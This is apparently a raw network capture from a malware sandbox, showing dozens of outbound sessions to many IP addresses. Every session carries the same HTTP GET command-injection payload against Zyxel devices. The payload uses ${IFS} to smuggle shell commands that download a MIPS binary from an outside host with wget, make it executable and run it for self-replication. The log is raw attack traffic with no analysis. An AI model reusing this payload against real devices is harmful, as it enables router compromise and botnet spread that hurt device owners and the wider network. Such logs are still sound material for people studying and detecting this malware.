                                                Jan 28, 2024 10:16:25.815361023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4465192.168.2.234731699.181.246.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815391064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4466192.168.2.2333282101.73.14.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815408945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4467192.168.2.235355024.201.8.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815438986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4468192.168.2.2357772122.59.252.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815465927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4469192.168.2.233402461.248.23.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815496922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4470192.168.2.235335869.250.220.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815525055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4471192.168.2.2353386152.206.144.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815540075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4472192.168.2.234651250.234.191.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815573931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4473192.168.2.234277620.213.41.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815604925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4474192.168.2.2351918106.112.10.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815613031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4475192.168.2.2347920113.90.206.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815644026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4476192.168.2.2334498154.101.40.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815666914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4477192.168.2.235854266.104.128.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815680027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4478192.168.2.234665088.254.144.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815702915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4479192.168.2.234104266.189.130.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815737009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4480192.168.2.2349800109.216.46.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815789938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4481192.168.2.2346250125.65.216.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815814972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4482192.168.2.2335880179.135.161.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815826893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4483192.168.2.23546922.198.226.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815862894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4484192.168.2.234171817.157.84.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815892935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4485192.168.2.2358578158.207.193.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815922976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4486192.168.2.235921449.178.204.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815937996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4487192.168.2.2346222118.90.28.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.815965891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4488192.168.2.2360088211.76.158.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816009045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4489192.168.2.2358504218.224.99.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816046000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4490192.168.2.233673014.93.234.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816052914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4491192.168.2.2351732136.167.176.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816076040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4492192.168.2.234478498.24.224.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816099882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4493192.168.2.233707431.2.122.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816116095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4494192.168.2.2335368208.80.211.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816139936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4495192.168.2.2344170143.71.146.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816180944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4496192.168.2.2352424107.131.83.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816221952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4497192.168.2.2339236124.178.107.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816241026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4498192.168.2.233435287.82.248.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816271067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4499192.168.2.2348988167.40.107.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816277981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4500192.168.2.2341656169.250.146.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816306114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4501192.168.2.2335626137.139.145.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816335917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4502192.168.2.236089034.56.151.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816359043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4503192.168.2.2352832104.102.206.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816395044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4504192.168.2.233426451.136.5.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816435099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4505192.168.2.235944040.103.202.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816447020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4506192.168.2.2336088138.239.114.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816467047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4507192.168.2.2348892173.190.103.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816494942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4508192.168.2.2341838108.120.91.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816526890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4509192.168.2.2343264212.245.233.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816553116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4510192.168.2.2354772192.212.72.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816586018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4511192.168.2.2337984139.56.248.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816601038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4512192.168.2.235106657.112.117.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816617012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4513192.168.2.235131623.180.196.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816651106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4514192.168.2.234341447.137.169.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816684008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4515192.168.2.234778057.110.135.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816725016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4516192.168.2.2339992130.35.132.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816744089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4517192.168.2.2346628197.195.97.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816776037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4518192.168.2.2356644166.179.9.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816777945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4519192.168.2.2354422189.133.220.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816819906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4520192.168.2.2346004213.172.193.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816848993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4521192.168.2.235684239.248.105.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816895008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4522192.168.2.2349250169.64.103.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816916943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4523192.168.2.2343410108.220.105.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816948891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4524192.168.2.235362664.179.140.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.816981077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4525192.168.2.2345906162.183.110.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:25.817012072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4526192.168.2.2337514134.104.222.19443
                                                TimestampBytes transferredDirectionData
